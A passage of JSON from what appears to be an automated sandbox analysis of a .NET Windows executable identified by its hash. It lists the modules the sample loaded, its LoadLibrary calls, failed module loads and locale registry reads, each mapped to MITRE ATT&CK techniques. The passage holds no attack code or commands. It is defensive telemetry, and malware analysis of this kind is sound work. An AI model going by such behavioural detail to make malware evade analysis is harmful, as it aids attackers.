\"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"MSCOREE.DLL\" at base 6bee0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"PSAPI.DLL\" at base 76d40000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"RPCRT4.DLL\" at base 758c0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"KERNEL32.DLL\" at base 77300000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 636d0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"CRYPTBASE.DLL\" at base 75330000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6e3c0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6b090000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 62c70000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 624f0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"SHELL32.DLL\" at base 760f0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"PROFAPI.DLL\" at base 75440000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75c50000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"NTDLL.DLL\" at base 77530000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6b070000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"BCRYPT.DLL\" at base 74f50000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"CRYPTSP.DLL\" at base 74e40000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74bd0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\NTDLL.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"SSPICLI.DLL\" at base 752c0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"OLEAUT32.DLL\" at base 776e0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\VERSION.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 61cd0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6af60000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"RASAPI32.DLL\" at base 6c180000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\DIASYMREADER.DLL\" at base 6ae50000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"RTUTILS.DLL\" at base 73590000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75c50000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75c50000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"WS2_32.DLL\" at base 75970000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74e00000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74960000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74df0000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"RASMAN.DLL\" at base 6c160000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 758C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64330000\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64AE0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKCU\\CONTROL PANEL\\INTERNATIONAL\"; Key: \"SYEARMONTH\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR-SA\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR-SA\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG-BG\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG-BG\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: 